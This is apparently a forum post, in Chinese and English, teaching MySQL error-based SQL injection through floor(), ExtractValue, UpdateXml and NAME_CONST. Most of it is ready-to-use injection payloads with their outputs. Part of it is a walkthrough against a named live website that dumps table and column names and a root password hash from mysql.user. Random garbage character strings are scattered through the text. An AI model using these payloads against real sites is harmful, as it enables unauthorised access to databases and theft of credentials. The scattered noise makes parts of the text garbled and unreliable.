mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
首先进行正常查询：

mysql> select * from article where id = 1;
+—-+——-+———+
| id | title | content |
( @% L6 M7 s2 G3 [8 c2 [+—-+——-+———+
|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
3 \! ?1 \7 S& L$ yERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

* u" a( q" b" b9 i$ F
; o: O, S+ W6 x( J' `7 X$ f' Q

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

' y3 H& u  B! w  T/ E8 x( }Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
  H/ k7 x! k: L* m& c
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′

MYSQL高版本报错注入技巧-利用NAME_CONST注入
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

1 E3 c# a6 S$ ^" G( ~+ k& n, O
9 r9 ~' H3 x( g& X" i' `* I0 [相关信息
. x, g& e$ k6 j) g: W+ m- b2 w
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

1 R4 h( d! ~+ D/ iCode:
3 e: m2 V& w' NNAME_CONST(DATA, VALUE)
+ l8 O* |& S2 y
  {' p/ c9 M3 D. u3 O  _Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
% f* e( e9 ~( {2 d
SELECT NAME_CONST('TEST', 1)



|---------------|
|     TEST      |
5 q3 ~! R6 D4 l% P% @|               |
6 {6 ^7 r9 S4 C# c- R- P|---------------|
|       1       |
" w5 R7 O  E, {  E' i$ k1 V- ~|               |
|---------------|

7 N; _9 A8 I1 w+ c% S4 Z4 O, V: P0 R! l
2 a( q- n1 L  `7 N3 C0 u& ]( z' _
8 `/ n# x! _% B' ?
- c9 V4 w8 q" s1 i7 ^: }& M  N( ^http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
! H, }) Q4 H3 }6 ~; D" j
4 w; K( z8 X7 \7 T  QOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
: h& f3 W% g6 c7 S2 B
) g( Z; R6 D" [% _  O7 ?; bCode:
/ z- o' I  ~2 G7 Ihttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261




" U4 A2 e& f, v' S; H6 J& r; A) e
9 ?" n) w4 `# {4 Y. MCode:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
( [% m$ M6 b8 C# u$ ~

VAR = Your MySQL variable.
: A5 q( O' m# h7 T# X
MySQL 5.1.3 Server System Variables
" X$ K2 e4 z: a
( y, p. R6 \& `" ?, x3 r5 dLet's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

; w5 t) [, k. h2 w, |Erroruplicate column name '5.0.27-community-nt'
3 |+ Y; S/ r$ R; |


* X9 n# {3 g7 G; x# P9 |5 ]. J

5 V0 m2 p  z" R4 W5 G* GNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
  i6 d$ W% A! m0 k5 L& h
Data Extraction

Code:
1 u+ M1 h, b. m$ A' ?9 J; U( D! p+ d+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--


We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
4 u1 b0 t; [9 v; \- g! O
! e+ \; R9 m" O" |/ @4 l7 lErroruplicate column name '1

5 U' [. B& P6 `+ K* s

# H+ A, c" Z% R/ r. D
$ J& M0 g/ f! E, P# _2 Y% N( w: _

Now let's get the tables out this bitch..

& ]/ f9 Y( r" E/ ?$ kCode:
5 r6 P, J! L( g% ]+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
- N- {) \. i: e, z& k" J) ]0 b
7 H! e5 d0 c6 W' D; n& W* T1 Y( X
Let's see if it works here, if it does, we can go on and finish the job.
, H% N$ s* |. M; x( U7 s
0 m* b5 q5 y5 p) CCode:
8 F# |( |6 R$ ^! E+ r4 U/ Hhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
* q6 d. |, s8 d6 J
/ _6 _# w! Z2 \1 N/ }. C
Erroruplicate column name 'com_admanage

1 n+ c( J% D' `2 h
- u, @9 h4 D3 ]$ a! z

# P$ m( @$ D5 d* F( S$ R
! E( V* E, S% b0 ?
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
% O3 j) r- e7 V! x
3 P8 d8 N! P. a( c- U! VLet's get the columns out of the user table..
! M; l+ |6 l% P8 j5 _) e
Code:
3 T6 y% k, j! R' [+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

' b2 v0 E0 f8 f& f9 r0 d  E
So mine looks like this, and I get the duplicate column name 'Host'.
6 U3 G1 z7 G# r& f5 I
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

+ C% |$ r! |3 q* A5 {: g/ AErroruplicate column name 'Host'
7 v9 Y8 z4 `8 K9 m; ]( K* P





Woot, time to finish this bitch off.
; z" V7 z& Z$ p/ u
! F" _$ c+ @6 t7 K$ YCode:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

" S* [* H0 F5 V
; n( H! U/ v' o) b# xSo mine looks like this...
, g* e! ^2 z! l: {- N6 B
Code:
% G1 A0 i" p- A% L/ `http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

/ M6 y+ W" N& f1 R4 f: G. pErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'




: e( y- r+ P! U- L& I& C) U& c1 I

4 N/ p+ \  B: r7 \And there we have it, thanks for reading.